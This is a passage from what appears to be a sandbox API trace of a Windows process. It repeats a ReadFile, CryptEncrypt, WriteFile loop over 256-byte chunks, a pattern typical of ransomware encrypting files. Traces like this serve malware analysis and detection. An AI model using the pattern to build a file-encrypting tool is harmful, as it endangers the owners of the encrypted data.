() returned 0x0 [0167.778] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.778] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.778] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.778] GetLastError () returned 0x0 [0167.778] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.778] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.778] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.778] GetLastError () returned 0x0 [0167.778] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.778] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.778] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.778] GetLastError () returned 0x0 [0167.778] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.779] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.779] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.779] GetLastError () returned 0x0 [0167.779] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.779] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.779] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.779] GetLastError () returned 0x0 [0167.779] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.779] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.779] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.779] GetLastError () returned 0x0 [0167.779] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.779] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.779] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.779] GetLastError () returned 0x0 [0167.779] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.779] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.779] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.779] GetLastError () returned 0x0 [0167.779] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.779] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.779] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.779] GetLastError () returned 0x0 [0167.779] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.779] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.780] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.780] GetLastError () returned 0x0 [0167.780] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.780] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.780] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.780] GetLastError () returned 0x0 [0167.780] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.780] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.780] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.780] GetLastError () returned 0x0 [0167.780] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.780] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.780] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.780] GetLastError () returned 0x0 [0167.780] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.780] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.780] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.780] GetLastError () returned 0x0 [0167.780] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.780] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.780] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.780] GetLastError () returned 0x0 [0167.780] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.780] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.780] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.781] GetLastError () returned 0x0 [0167.781] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.781] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.781] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.781] GetLastError () returned 0x0 [0167.781] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.781] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.781] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.781] GetLastError () returned 0x0 [0167.781] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.781] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.781] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.781] GetLastError () returned 0x0 [0167.781] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.781] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.781] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.781] GetLastError () returned 0x0 [0167.781] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.781] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.781] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.781] GetLastError () returned 0x0 [0167.781] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.781] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.781] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.781] GetLastError () returned 0x0 [0167.781] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.782] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.782] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.782] GetLastError () returned 0x0 [0167.782] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.782] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.782] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.782] GetLastError () returned 0x0 [0167.782] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.782] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.782] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.782] GetLastError () returned 0x0 [0167.782] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.782] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.782] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.782] GetLastError () returned 0x0 [0167.782] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.782] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.782] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.782] GetLastError () returned 0x0 [0167.782] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.782] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.782] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.782] GetLastError () returned 0x0 [0167.782] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.782] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.783] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.783] GetLastError () returned 0x0 [0167.783] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.783] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.783] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.783] GetLastError () returned 0x0 [0167.783] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.783] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.783] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.783] GetLastError () returned 0x0 [0167.783] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.783] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.783] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.783] GetLastError () returned 0x0 [0167.783] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, 